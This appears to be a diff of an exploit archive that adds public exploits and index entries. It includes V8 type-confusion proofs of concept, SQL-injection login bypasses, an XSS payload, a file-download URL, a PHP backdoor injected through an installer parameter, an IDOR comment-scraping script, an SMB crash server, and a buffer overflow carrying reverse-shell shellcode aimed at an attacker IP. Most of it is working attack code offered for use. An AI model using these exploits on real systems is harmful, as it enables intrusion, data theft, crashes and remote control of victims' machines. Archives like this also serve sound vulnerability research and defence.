# Fatal error in ../../v8/src/objects-inl.h, line 1750
# Debug check failed: index < this->length() (0 vs. 0).
#
==== C stack trace ===============================
0 d8 0x00000001071f6372 v8::base::debug::StackTrace::StackTrace() + 34
1 d8 0x00000001071fdcc0 v8::platform::(anonymous namespace)::PrintStackTrace() + 192
2 d8 0x00000001071eaf4a V8_Fatal(char const*, int, char const*, ...) + 442
3 d8 0x00000001071ea6af v8::base::(anonymous namespace)::DefaultDcheckHandler(char const*, int, char const*) + 47
4 d8 0x0000000105b0375c v8::internal::PropertyArray::set(int, v8::internal::Object*) + 1116
5 d8 0x000000010630e10e v8::internal::JSObject::MigrateToMap(v8::internal::Handle<v8::internal::JSObject>, v8::internal::Handle<v8::internal::Map>, int) + 18558
6 d8 0x00000001061f858b v8::internal::LookupIterator::ApplyTransitionToDataProperty(v8::internal::Handle<v8::internal::JSObject>) + 1899
7 d8 0x000000010632221e v8::internal::Object::AddDataProperty(v8::internal::LookupIterator*, v8::internal::Handle<v8::internal::Object>, v8::internal::PropertyAttributes, v8::internal::ShouldThrow, v8::internal::Object::StoreFromKeyed) + 2254
8 d8 0x000000010631f338 v8::internal::Object::SetProperty(v8::internal::LookupIterator*, v8::internal::Handle<v8::internal::Object>, v8::internal::LanguageMode, v8::internal::Object::StoreFromKeyed) + 1112
9 d8 0x0000000105f90c07 v8::internal::StoreIC::Store(v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Name>, v8::internal::Handle<v8::internal::Object>, v8::internal::Object::StoreFromKeyed) + 4647
10 d8 0x0000000105f9ca62 v8::internal::KeyedStoreIC::Store(v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>) + 2258
11 d8 0x0000000105fae469 v8::internal::__RT_impl_Runtime_KeyedStoreIC_Miss(v8::internal::Arguments, v8::internal::Isolate*) + 1321
12 d8 0x0000000105fad513 v8::internal::Runtime_KeyedStoreIC_Miss(int, v8::internal::Object**, v8::internal::Isolate*) + 979
13 ??? 0x000000010d385204 0x0 + 4516762116
Received signal 4 <unknown> 0001071f2478
Illegal instruction: 4
It seems like OOB writes, but actually it is not. array->length() just returns 0, it's allocated enough to contain 1024 elements. But this affects the Garbage Collector to reallocate the array with the 0 length. So after the garbage collection, it can lead to OOB reads/writes.
PoC:
*/
function gc() {
for (let i = 0; i < 20; i++)
new ArrayBuffer(0x1000000);
}
function trigger() {
function* generator() {
}
for (let i = 0; i < 1022; i++) {
generator.prototype['b' + i];
generator.prototype['b' + i] = 0x1234;
}
gc();
for (let i = 0; i < 1022; i++) {
generator.prototype['b' + i] = 0x1234;
}
}
trigger();

61
exploits/multiple/dos/44180.js Normal file
View file

@ -0,0 +1,61 @@
/*
Here'a snippet of TranslatedState::MaterializeCapturedObjectAt.
case JS_SET_KEY_VALUE_ITERATOR_TYPE:
case JS_SET_VALUE_ITERATOR_TYPE: {
Handle<JSSetIterator> object = Handle<JSSetIterator>::cast(
isolate_->factory()->NewJSObjectFromMap(map, NOT_TENURED));
Handle<Object> properties = materializer.FieldAt(value_index);
Handle<Object> elements = materializer.FieldAt(value_index);
Handle<Object> table = materializer.FieldAt(value_index);
Handle<Object> index = materializer.FieldAt(value_index);
object->set_raw_properties_or_hash(*properties);
object->set_elements(FixedArrayBase::cast(*elements));
object->set_table(*table);
object->set_index(*index);
return object;
}
case JS_MAP_KEY_ITERATOR_TYPE:
case JS_MAP_KEY_VALUE_ITERATOR_TYPE:
case JS_MAP_VALUE_ITERATOR_TYPE: {
Handle<JSMapIterator> object = Handle<JSMapIterator>::cast(
isolate_->factory()->NewJSObjectFromMap(map, NOT_TENURED));
Handle<Object> properties = materializer.FieldAt(value_index);
Handle<Object> elements = materializer.FieldAt(value_index);
Handle<Object> table = materializer.FieldAt(value_index);
Handle<Object> index = materializer.FieldAt(value_index);
object->set_raw_properties_or_hash(*properties);
object->set_elements(FixedArrayBase::cast(*elements));
object->set_table(*table);
object->set_index(*index);
return object;
}
For these 5 types, it doesn't cache the created objects like "slot->value_ = object". This can be used to create different objects but sharing the same properties which may lead to type confusion.
PoC:
*/
function opt(b) {
let iterator = new Set().values();
iterator.x = 0;
let arr = [iterator, iterator];
if (b)
return arr.slice();
}
for (let i = 0; i < 100000; i++)
opt(false);
let res = opt(true);
let a = res[0];
let b = res[1];
print(a === b); // false
a.x = 7;
print(b.x); // 7
a.a = 1.1; // transition
b.b = 0x1234;
a.a = 1.1; // type confusion

19
exploits/php/webapps/44185.txt Normal file
View file

@ -0,0 +1,19 @@
######################################################################################
# Exploit Title: Schools Alert Management Script - 2.0.2 - Authentication Bypass
# Date: 07.02.2018
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 2.0.2
# Tested on: Linux Mint
# CVE: CVE-2018-6859
#######################################################################################
Proof of Concept
=================
1. Go to login page
2. Choose Student/Parent/Management to login
2. put [admin' OR '1' = '1] as user and password field
3. You will be logged in as Student/Parent/Management

24
exploits/php/webapps/44186.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: MyBB My Arcade Plugin v1.3 - Persistent XSS
# Date: 2/21/2018
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]protonmail.com
# Software Link: https://community.mybb.com/mods.php?action=view&pid=411
# Version: 1.3
# Tested on: Ubuntu 17.10
1. Description:
The My Arcade plugin adds a page of arcade games and keeps track of user scores, also allowing users to add a comment next to their score. The comment box is vulnerable to a persistent XSS.
2. Proof of Concept:
Persistent XSS
- Play an arcade game
- Add the following comment to your score <p """><SCRIPT>alert("XSS")</SCRIPT>">
- Edit the comment, Boom.
3. Solution:
Update to 1.3.1
Patch: https://github.com/PaulBender/My-Arcade/commit/4ee2a2e8d245defb94930c2c377e78ddfb0fcc94

23
exploits/php/webapps/44188.txt Normal file
View file

@ -0,0 +1,23 @@
# # # #
# Exploit Title: Joomla! Component K2 2.8.0 - Arbitrary File Download
# Dork: N/A
# Date: 26.02.2018
# Vendor Homepage: http://www.joomlaworks.net/
# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/k2/
# Software Download: https://getk2.org/downloads/?f=K2_v2.8.0.zip
# Version: 2.8.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7482
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# The vulnerability allows an users to arbitrary download files..
#
# 1)
# http://localhost/[PATH]/index.php?option=com_k2&view=media&task=connector&cmd=file&target=l1_[FILE_BASE64]&download=1&[TOKEN]=1
#
# # # #

20
exploits/php/webapps/44191.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: SQL Injection exists in PHP Scripts Mall School Management Script 3.0.4.
# Date: 26/02/2018
# Exploit Author: Samiran Santra
# Vendor Homepage: https://www.phpscriptsmall.com
# Software Link: https://www.phpscriptsmall.com/product/school-management-system
# Version: v3.0.4
#Tested on: Windows
# Website: https://indiancybersecuritysolutions.com/
# CVE: CVE-2018-7477
# Category: webapps
Proof of Concept
1.First go to this link- http://localhost/PATH/parents/Parent_module/parent_login.php
2.In Username and Password filed just type sql-injection cheat-code (x'or'x'='x)
3.Now you can successfully login as a admin user

46
exploits/php/webapps/44192.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: CMS Made Simple 2.1.6 - Remote Code Execution
# Date: 2018-02-26
# Exploit Author: Keerati T.
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/13570/cmsms-2.
1.6-install.zip
# Version: 2.1.6
# CVE: CVE-2018-7448
# Tested on: Linux
1.Description
Arbitrary PHP code can be injected into configuration file (config.php) after installation has been finished. In order to inject PHP code, fresh install and valid database credentials is required. Application will force an installer (usually "www-data" due to web-based installation) to set a write permission (777) to destination directory and related installation file. An attacker will proceed installation process until reach step 4 and inject malicious PHP code into "timezone" parameter. Once PHP code has been injected to "config.php", an attacker will be able to execute OS command by accessing backdoor "config.php" file along with injected parameter which contain OS command value.
2.Proof of Concept
- Access to "http://target/path/cmsms-2.1.6-install.php" for installing CMS Made Simple
- Proceed to step 4 of installation which is database setup stage, enter a valid database credentials and modifying "timezone" parameter on intercepted proxy as following:
==========
POST /cms/cmsms-2.1.6-install.php/index.php?mdf68c24c=4 HTTP/1.1
Host: 192.168.5.196
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.196/cms/cmsms-2.1.6-install.php/index.
php?mdf68c24c=4
Cookie: CMSICc861538bbb=i549m59qpme0u9klupbkb68me4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
dbhost=localhost&dbname=cms&dbuser=xvwa&dbpass=xvwa&
timezone=junk';echo%20system($_GET['cmd']);$junk='junk&next=Next+%E2%86%92
==========
- Forward tampered "timezone" parameter packet and proceed to next step until successfully installation.
- Execute OS command via "config.php" by requesting " http://target/path/config.php?cmd=id;uname"
3.Timeline
2017-04-14 Vulnerability report
2017-04-15 Vendor inform that will be fixed on next full release
2017-06-10 Version 2.2 release and vulnerability fixed
2018-02-23 CVE assigned
2018-02-26 Public

78
exploits/php/webapps/44194.py Executable file
View file

@ -0,0 +1,78 @@
#!/usr/bin/env python3
# Concrete5 < 8.3 vulnerable to Authorization Bypass Through User-Controlled Key (IDOR)
# CVE-2017-18195
# Chapman (R3naissance) Schleiss
from queue import Queue
from threading import Thread
from bs4 import BeautifulSoup
from tabulate import tabulate
import argparse
import requests
import logging
parser = argparse.ArgumentParser(
description="This script attempts to enumerate all comments from a vulnerable Concrete5 CMS.",
)
parser.add_argument('-u','--url', action='store', dest='url', required=True,
help="This is the url to attack. Typically http://example.com/index.php/tools/required/conversations/view_ajax")
parser.add_argument('-s','--start', action='store', type=int, dest='start_id',
help='Where to start enumeration')
parser.add_argument('-e','--end', action='store', type=int, dest='end_id',
help='Where to end enumeration')
parser.add_argument('-v','--verbose', action='store_true', dest='verbose',
help='This boolean flag will trigger all raw information to stdout')
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG, format='[%(levelname)s] - %(threadName)s - %(message)s')
else:
logging.basicConfig(level=logging.INFO, format='[%(levelname)s] %(message)s')
if args.start_id is None:
args.start_id = 1
if args.end_id is None:
args.end_id = 10
def crawl(q, result):
while not q.empty():
work = q.get()
logging.debug("Requesting cnvID: " + str(work))
try:
response = requests.post(args.url, data={'cnvID': work, 'cID': 1}, timeout=300)
logging.debug("Requested cnvID: %s [%s]", str(work), str(response.status_code))
if response.status_code < 400 or response.status_code > 499:
logging.debug("Parsing html and adding comments to results list")
soup = BeautifulSoup(response.text, 'html.parser')
username = soup.find_all('span', {'class': 'ccm-conversation-message-username'})
message = soup.find_all('div', {'class': 'ccm-conversation-message-body'})
for i in range(len(username)):
results.append((work, username[i].text.strip(), message[i].text.strip()))
logging.info("Completed cnvID: " + str(work))
except:
logging.error('Error getting cnvID: ' + str(work))
q.task_done()
return True
q = Queue(maxsize=0)
enum = range(args.start_id, args.end_id + 1)
num_theads = min(50, len(enum))
results = []
for i in enum:
q.put(i)
for i in range(num_theads):
logging.debug('Starting thread ' + str(i))
worker = Thread(target=crawl, args=(q, results), name="Thread: " + str(i))
worker.setDaemon(True)
worker.start()
logging.debug('Waiting for final threads to complete')
q.join()
logging.info('Enumeration complete')
print(tabulate(results, headers=('cnvID', 'username', 'message'), tablefmt='grid'))

22
exploits/windows/dos/44189.py Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service
# Date: 26/02/2018
# Exploit Author: Nabeel Ahmed
# Version: SMBv3
# Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64)
# CVE : CVE-2018-0833
import SocketServer
from binascii import unhexlify
payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141'
class byebye(SocketServer.BaseRequestHandler):
def handle(self):
try:
print "From:", self.client_address
print "[*]Sending Payload..."
self.request.send(unhexlify(payload))
except Exception:
print "BSoD Triggered on", self.client_address
pass
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),byebye)
launch.serve_forever()

90
exploits/windows/remote/44187.py Executable file
View file

@ -0,0 +1,90 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: GetGo Download Manager 5.3.0.2712 - Remote Buffer Overflow (SEH)
# Date: 02-24-2018
# Vulnerable Software: GetGo Download Manager 5.3.0.2712
# Vendor Homepage: http://www.getgosoft.com/
# Version: 5.3.0.2712
# Software Link: https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe
# Tested On: Windows XP SP3
#
#
# PoC:
# 1. setup listener 443 on attacking machine
# 2. run script on attacking machine
# 3. open app on victim machine
# 4. go to download
# 5. select new, add http://attackerip to URL, index.html to File Name, and select OK
# 6. check listener, remote shell
#
import sys
import socket
import os
import time
host = "192.168.0.149"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] listening on %d ..." % port
bz, addr = s.accept()
print "[+] connection accepted from %s" % addr[0]
junk = "A"*20
#jump 6
nseh = "\xeb\x06\x90\x90"
#0x72d11f39 : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [msacm32.drv]
seh = "\x39\x1f\xd1\x72"
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.149 LPORT=443 -b "\x00" -f c
#Payload size: 351 bytes
reverse = (
"\xba\x8f\xf6\x0e\x24\xd9\xf7\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x52\x31\x50\x12\x83\xc0\x04\x03\xdf\xf8\xec\xd1\x23\xec\x73"
"\x19\xdb\xed\x13\x93\x3e\xdc\x13\xc7\x4b\x4f\xa4\x83\x19\x7c"
"\x4f\xc1\x89\xf7\x3d\xce\xbe\xb0\x88\x28\xf1\x41\xa0\x09\x90"
"\xc1\xbb\x5d\x72\xfb\x73\x90\x73\x3c\x69\x59\x21\x95\xe5\xcc"
"\xd5\x92\xb0\xcc\x5e\xe8\x55\x55\x83\xb9\x54\x74\x12\xb1\x0e"
"\x56\x95\x16\x3b\xdf\x8d\x7b\x06\xa9\x26\x4f\xfc\x28\xee\x81"
"\xfd\x87\xcf\x2d\x0c\xd9\x08\x89\xef\xac\x60\xe9\x92\xb6\xb7"
"\x93\x48\x32\x23\x33\x1a\xe4\x8f\xc5\xcf\x73\x44\xc9\xa4\xf0"
"\x02\xce\x3b\xd4\x39\xea\xb0\xdb\xed\x7a\x82\xff\x29\x26\x50"
"\x61\x68\x82\x37\x9e\x6a\x6d\xe7\x3a\xe1\x80\xfc\x36\xa8\xcc"
"\x31\x7b\x52\x0d\x5e\x0c\x21\x3f\xc1\xa6\xad\x73\x8a\x60\x2a"
"\x73\xa1\xd5\xa4\x8a\x4a\x26\xed\x48\x1e\x76\x85\x79\x1f\x1d"
"\x55\x85\xca\xb2\x05\x29\xa5\x72\xf5\x89\x15\x1b\x1f\x06\x49"
"\x3b\x20\xcc\xe2\xd6\xdb\x87\xcc\x8f\xe3\xc2\xa5\xcd\xe3\xed"
"\x8e\x5b\x05\x87\xe0\x0d\x9e\x30\x98\x17\x54\xa0\x65\x82\x11"
"\xe2\xee\x21\xe6\xad\x06\x4f\xf4\x5a\xe7\x1a\xa6\xcd\xf8\xb0"
"\xce\x92\x6b\x5f\x0e\xdc\x97\xc8\x59\x89\x66\x01\x0f\x27\xd0"
"\xbb\x2d\xba\x84\x84\xf5\x61\x75\x0a\xf4\xe4\xc1\x28\xe6\x30"
"\xc9\x74\x52\xed\x9c\x22\x0c\x4b\x77\x85\xe6\x05\x24\x4f\x6e"
"\xd3\x06\x50\xe8\xdc\x42\x26\x14\x6c\x3b\x7f\x2b\x41\xab\x77"
"\x54\xbf\x4b\x77\x8f\x7b\x7b\x32\x8d\x2a\x14\x9b\x44\x6f\x79"
"\x1c\xb3\xac\x84\x9f\x31\x4d\x73\xbf\x30\x48\x3f\x07\xa9\x20"
"\x50\xe2\xcd\x97\x51\x27")
fill = "D"*(4055 - len(reverse))
payload = junk + nseh + seh + reverse + fill
buffer = payload + "\r"
buffer+= payload + "\r"
buffer+= payload + "\r\n"
print bz.recv(1000)
bz.send(buffer)
print "[+] sending buffer ok\n"
time.sleep(3)
bz.close()
s.close()

16
files_exploits.csv
View file

@ -5870,6 +5870,14 @@ id,file,description,date,author,type,platform,port
44146,exploits/windows/dos/44146.cpp,"Microsoft Windows Kernel - 'nt!RtlpCopyLegacyContextX86' Stack Memory Disclosure",2018-02-20,"Google Security Research",dos,windows,
44153,exploits/windows/dos/44153.html,"Microsoft Internet Explorer 11 - 'Js::RegexHelper::RegexReplace' Use-After-Free",2018-02-20,"Google Security Research",dos,windows,
44154,exploits/multiple/dos/44154.py,"Wavpack 5.1.0 - Denial of Service",2018-02-21,r4xis,dos,multiple,
44178,exploits/multiple/dos/44178.txt,"Transmission - Integer Overflows Parsing Torrent Files",2018-02-27,"Google Security Research",dos,multiple,
44179,exploits/multiple/dos/44179.js,"Chrome V8 - 'PropertyArray' Integer Overflow",2018-02-27,"Google Security Research",dos,multiple,
44180,exploits/multiple/dos/44180.js,"Chrome V8 - 'TranslatedState::MaterializeCapturedObjectAt' Type Confusion",2018-02-27,"Google Security Research",dos,multiple,
44181,exploits/linux/dos/44181.py,"Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5061
44182,exploits/linux/dos/44182.py,"Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060
44183,exploits/linux/dos/44183.py,"Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060
44184,exploits/linux/dos/44184.py,"Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption",2018-02-27,EnableSecurity,dos,linux,5060
44189,exploits/windows/dos/44189.py,"Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9535,6 +9543,7 @@ id,file,description,date,author,type,platform,port
44167,exploits/windows_x86/local/44167.c,"NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86,
44168,exploits/windows_x86-64/local/44168.py,"NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64,
44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,
44177,exploits/bsd/local/44177.c,"Sony Playstation 4 4.55 FW - Local Kernel",2018-02-26,qwertyoruiop,local,bsd,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16255,6 +16264,7 @@ id,file,description,date,author,type,platform,port
44174,exploits/windows/remote/44174.rb,"Disk Savvy Enterprise 10.4.18 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,9124
44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888
44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999
44187,exploits/windows/remote/44187.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38908,3 +38918,9 @@ id,file,description,date,author,type,platform,port
44170,exploits/php/webapps/44170.txt,"Learning and Examination Management System - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
44171,exploits/php/webapps/44171.txt,"Alibaba Clone Script 1.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php,
44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
44188,exploits/php/webapps/44188.txt,"Joomla! Component K2 2.8.0 - Arbitrary File Download",2018-02-27,"Ihsan Sencan",webapps,php,
44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,

Can't render this file because it is too large.